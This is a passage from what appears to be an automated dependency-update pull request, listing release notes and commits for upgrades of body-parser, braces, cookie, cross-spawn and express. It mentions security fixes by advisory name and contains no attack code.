href=\"https://redirect.github.com/expressjs/body-parser/pull/521\"\u003eexpressjs/body-parser#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OSSF Scorecard badge by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/531\"\u003eexpressjs/body-parser#531\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLinter by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/534\"\u003eexpressjs/body-parser#534\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.3 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/535\"\u003eexpressjs/body-parser#535\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/blob/1.20.5/HISTORY.md\"\u003ebody-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.20.5 / 2026-04-24\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003erefactor(json): simplify strict mode error string construction\u003c/li\u003e\n\u003cli\u003efix: extended urlencoded parsing of arrays with \u0026gt;100 elements (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/716\"\u003e#716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: qs@~6.15.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.4 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@~6.14.0\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: http-errors@~2.0.1\u003c/li\u003e\n\u003cli\u003edeps: raw-body@~2.5.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.3 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.2 / 2023-02-21\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix strict json error message on Node.js 19+\u003c/li\u003e\n\u003cli\u003edeps: content-type@~1.0.5\n\u003cul\u003e\n\u003cli\u003eperf: skip value escaping when unnecessary\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: raw-body@2.5.2\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/0defdbe7f95ad0d3bc007d3a7c59c8c0ab9e6575\"\u003e\u003ccode\u003e0defdbe\u003c/code\u003e\u003c/a\u003e release(patch): 1.20.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/cd0e7a000c53e7be7262d303e57a352b6a00db7f\"\u003e\u003ccode\u003ecd0e7a0\u003c/code\u003e\u003c/a\u003e deps(qs): bump qs to 6.15.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/6f24d7e8bcd9860b136920926ce86da1a7dd1d51\"\u003e\u003ccode\u003e6f24d7e\u003c/code\u003e\u003c/a\u003e fix: correct off-by-one error in parameterCount (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/716\"\u003e#716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/b849bd533d8b4abf5576a3e301f28d9befa05ddd\"\u003e\u003ccode\u003eb849bd5\u003c/code\u003e\u003c/a\u003e deps: qs@~6.14.1 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/690\"\u003e#690\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/2c55e2f712f320a8e8d0f9fcb1d06526d0e401c9\"\u003e\u003ccode\u003e2c55e2f\u003c/code\u003e\u003c/a\u003e refactor(json): simplify strict mode error string construction (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/692\"\u003e#692\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/7db202cac84a001e6566c2dc6516b44db98beff3\"\u003e\u003ccode\u003e7db202c\u003c/code\u003e\u003c/a\u003e 1.20.4 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/672\"\u003e#672\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/d8f8adb898676dfdf997b4455e5f9b689b53e989\"\u003e\u003ccode\u003ed8f8adb\u003c/code\u003e\u003c/a\u003e ci: add CodeQL (SAST) (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/670\"\u003e#670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/6d133c19b3e7c0bb8301959ca1dba283d23d23c3\"\u003e\u003ccode\u003e6d133c1\u003c/code\u003e\u003c/a\u003e chore: remove SECURITY.md (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/669\"\u003e#669\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/fcd15355041ada6f37288dd13858d50429016b66\"\u003e\u003ccode\u003efcd1535\u003c/code\u003e\u003c/a\u003e deps: use tilde notation and update certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/668\"\u003e#668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/ec5fa290d25d85e0049757e240249072331eaee6\"\u003e\u003ccode\u003eec5fa29\u003c/code\u003e\u003c/a\u003e deps: qs@~6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/664\"\u003e#664\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.1...1.20.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for body-parser since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `braces` from 3.0.2 to 3.0.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/74b2db2938fad48a2ea54a9c8bf27a37a62c350d\"\u003e\u003ccode\u003e74b2db2\u003c/code\u003e\u003c/a\u003e 3.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/88f1429a0f47e1dd3813de35211fc97ffda27f9e\"\u003e\u003ccode\u003e88f1429\u003c/code\u003e\u003c/a\u003e update eslint. lint, fix unit tests.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff\"\u003e\u003ccode\u003e415d660\u003c/code\u003e\u003c/a\u003e Snyk js braces 6838727 (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/40\"\u003e#40\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/190510f79db1adf21d92798b0bb6fccc1f72c9d6\"\u003e\u003ccode\u003e190510f\u003c/code\u003e\u003c/a\u003e fix tests, skip 1 test in test/braces.expand\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/716eb9f12d820b145a831ad678618731927e8856\"\u003e\u003ccode\u003e716eb9f\u003c/code\u003e\u003c/a\u003e readme bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/a5851e57f45c3431a94d83fc565754bc10f5bbc3\"\u003e\u003ccode\u003ea5851e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/braces/issues/37\"\u003e#37\u003c/a\u003e from coderaiser/fix/vulnerability\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/2092bd1fb108d2c59bd62e243b70ad98db961538\"\u003e\u003ccode\u003e2092bd1\u003c/code\u003e\u003c/a\u003e feature: braces: add maxSymbols (\u003ca href=\"https://github.com/micromatch/braces/issues/\"\u003ehttps://github.com/micromatch/braces/issues/\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/9f5b4cf47329351bcb64287223ffb6ecc9a5e6d3\"\u003e\u003ccode\u003e9f5b4cf\u003c/code\u003e\u003c/a\u003e fix: vulnerability (\u003ca href=\"https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\"\u003ehttps://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/98414f9f1fabe021736e26836d8306d5de747e0d\"\u003e\u003ccode\u003e98414f9\u003c/code\u003e\u003c/a\u003e remove funding file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/665ab5d561c017a38ba7aafd92cc6655b91d8c14\"\u003e\u003ccode\u003e665ab5d\u003c/code\u003e\u003c/a\u003e update keepEscaping doc (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/27\"\u003e#27\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/braces/compare/3.0.2...3.0.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cookie` from 0.5.0 to 0.7.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jshttp/cookie/releases\"\u003ecookie's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.2\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix object assignment of \u003ccode\u003ehasOwnProperty\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/177\"\u003e#177\u003c/a\u003e)  bc38ffd\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/jshttp/cookie/compare/v0.7.1...v0.7.2\"\u003ehttps://github.com/jshttp/cookie/compare/v0.7.1...v0.7.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.7.1\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAllow leading dot for domain (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/174\"\u003e#174\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eAlthough not permitted in the spec, some users expect this to work and user agents ignore the leading dot according to spec\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd fast path for \u003ccode\u003eserialize\u003c/code\u003e without options, use \u003ccode\u003eobj.hasOwnProperty\u003c/code\u003e when parsing (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/172\"\u003e#172\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/jshttp/cookie/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/jshttp/cookie/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.7.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eperf: parse cookies ~10% faster (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/144\"\u003e#144\u003c/a\u003e by \u003ca href=\"https://github.com/kurtextrem\"\u003e\u003ccode\u003e@​kurtextrem\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/170\"\u003e#170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: narrow the validation of cookies to match RFC6265 (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/167\"\u003e#167\u003c/a\u003e by \u003ca href=\"https://github.com/bewinsnw\"\u003e\u003ccode\u003e@​bewinsnw\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: add \u003ccode\u003emain\u003c/code\u003e to \u003ccode\u003epackage.json\u003c/code\u003e for rspack (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/166\"\u003e#166\u003c/a\u003e by \u003ca href=\"https://github.com/proudparrot2\"\u003e\u003ccode\u003e@​proudparrot2\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/jshttp/cookie/compare/v0.6.0...v0.7.0\"\u003ehttps://github.com/jshttp/cookie/compare/v0.6.0...v0.7.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.6.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003epartitioned\u003c/code\u003e option\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/d19eaa1a2bb9ca43ac0951edd852ba4e88e410e0\"\u003e\u003ccode\u003ed19eaa1\u003c/code\u003e\u003c/a\u003e 0.7.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/bc38ffd0eae716b199236dda061d0bdc74192dd3\"\u003e\u003ccode\u003ebc38ffd\u003c/code\u003e\u003c/a\u003e Fix object assignment of \u003ccode\u003ehasOwnProperty\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/177\"\u003e#177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/cf4658f492c5bd96aeaf5693c3500f8495031014\"\u003e\u003ccode\u003ecf4658f\u003c/code\u003e\u003c/a\u003e 0.7.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/6a8b8f5a49af7897b98ebfb29a1c4955afa3d33e\"\u003e\u003ccode\u003e6a8b8f5\u003c/code\u003e\u003c/a\u003e Allow leading dot for domain (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/174\"\u003e#174\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/58015c0b93de0b63db245cfdc5a108e511a81ad0\"\u003e\u003ccode\u003e58015c0\u003c/code\u003e\u003c/a\u003e Remove more code and perf wins (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/172\"\u003e#172\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/ab057d6c06b94a7b1e3358e69a685ae49c97b627\"\u003e\u003ccode\u003eab057d6\u003c/code\u003e\u003c/a\u003e 0.7.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/5f02ca87688481dbcf155e49ca8b61732f30e542\"\u003e\u003ccode\u003e5f02ca8\u003c/code\u003e\u003c/a\u003e Migrate history to GitHub releases\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/a5d591ce8447dd63821779724f96ad3c774c8579\"\u003e\u003ccode\u003ea5d591c\u003c/code\u003e\u003c/a\u003e Migrate history to GitHub releases\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/51968f94b5e820adeceef505539fa193ffe2d105\"\u003e\u003ccode\u003e51968f9\u003c/code\u003e\u003c/a\u003e Skip isNaN\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jshttp/cookie/commit/9e7ca51ade4b325307eedd6b4dec190983e9e2cc\"\u003e\u003ccode\u003e9e7ca51\u003c/code\u003e\u003c/a\u003e perf(parse): cache length, return early (\u003ca href=\"https://redirect.github.com/jshttp/cookie/issues/144\"\u003e#144\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jshttp/cookie/compare/v0.5.0...v0.7.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~blakeembrey\"\u003eblakeembrey\u003c/a\u003e, a new releaser for cookie since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cross-spawn` from 7.0.3 to 7.0.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/blob/master/CHANGELOG.md\"\u003ecross-spawn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.5...v7.0.6\"\u003e7.0.6\u003c/a\u003e (2024-11-18)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate cross-spawn version to 7.0.5 in package-lock.json (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003ef700743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.4...v7.0.5\"\u003e7.0.5\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix escaping bug introduced by backtracking (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e640d391\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.4\"\u003e7.0.4\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edisable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e5ff3a07\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/77cd97f3ca7b62c904a63a698fc4a79bf41977d0\"\u003e\u003ccode\u003e77cd97f\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/6717de49ff1e5de49622488dcb9c33fb25370c85\"\u003e\u003ccode\u003e6717de4\u003c/code\u003e\u003c/a\u003e chore: upgrade standard-version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003e\u003ccode\u003ef700743\u003c/code\u003e\u003c/a\u003e fix: update cross-spawn version to 7.0.5 in package-lock.json\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/9a7e3b2165917367f74b8365faad9873b30d7263\"\u003e\u003ccode\u003e9a7e3b2\u003c/code\u003e\u003c/a\u003e chore: fix build status badge\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/085268352dcbcad8064c64c5efb25268b4023184\"\u003e\u003ccode\u003e0852683\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e\u003ccode\u003e640d391\u003c/code\u003e\u003c/a\u003e fix: fix escaping bug introduced by backtracking\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/bff0c87c8b627c4e6d04ec2449e733048bebb464\"\u003e\u003ccode\u003ebff0c87\u003c/code\u003e\u003c/a\u003e chore: remove codecov\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/a7c6abc6fee79641d45b452fe6217deaa1bd0973\"\u003e\u003ccode\u003ea7c6abc\u003c/code\u003e\u003c/a\u003e chore: replace travis with github workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/9b9246e0969e86656d7ccd527716bc3c18842a19\"\u003e\u003ccode\u003e9b9246e\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e\u003ccode\u003e5ff3a07\u003c/code\u003e\u003c/a\u003e fix: disable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.18.2 to 4.22.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/releases\"\u003eexpress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.22.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: restore \u0026gt;20 array parsing for \u003ccode\u003ereq.query\u003c/code\u003e repeated keys (\u003ca href=\"https://github.com/expressjs/express/commit/8d09bfe6d88983da5c3e12cfdd54782c4dc675db\"\u003e\u003ccode\u003e8d09bfe6\u003c/code\u003e\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eThis also unifies array-cap behavior across notations. Indexed notation (\u003ccode\u003ea[0]=...\u003c/code\u003e) was historically capped at qs's default \u003ccode\u003earrayLimit\u003c/code\u003e of 20 even in older qs versions; after this change it also allows up to 1000 items.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: qs@~6.15.1\u003c/li\u003e\n\u003cli\u003edeps: body-parser@~1.20.5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/suuuuuuminnnnnn\"\u003e\u003ccode\u003e@​suuuuuuminnnnnn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/7021\"\u003eexpressjs/express#7021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/SAY-5\"\u003e\u003ccode\u003e@​SAY-5\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/7181\"\u003eexpressjs/express#7181\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/v4.22.1...v4.22.2\"\u003ehttps://github.com/expressjs/express/compare/v4.22.1...v4.22.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.22.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!IMPORTANT]\u003cbr /\u003e\nThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cul\u003e\n\u003cli\u003eRelease: 4.22.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6934\"\u003eexpressjs/express#6934\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.22.0...v4.22.1\"\u003ehttps://github.com/expressjs/express/compare/4.22.0...v4.22.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.22.0\u003c/h2\u003e\n\u003ch2\u003eImportant: Security\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRefactor: improve readability by \u003ca href=\"https://github.com/sazk07\"\u003e\u003ccode\u003e@​sazk07\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6190\"\u003eexpressjs/express#6190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js@23.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6080\"\u003eexpressjs/express#6080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMethod functions with no path should error by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5957\"\u003eexpressjs/express#5957\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: updated github actions ci workflow by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6323\"\u003eexpressjs/express#6323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6336\"\u003eexpressjs/express#6336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackport: ci: add node.js 24 to test matrix by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6506\"\u003eexpressjs/express#6506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(4.x): wider range for query test skip by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6513\"\u003eexpressjs/express#6513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse tilde notation for certain 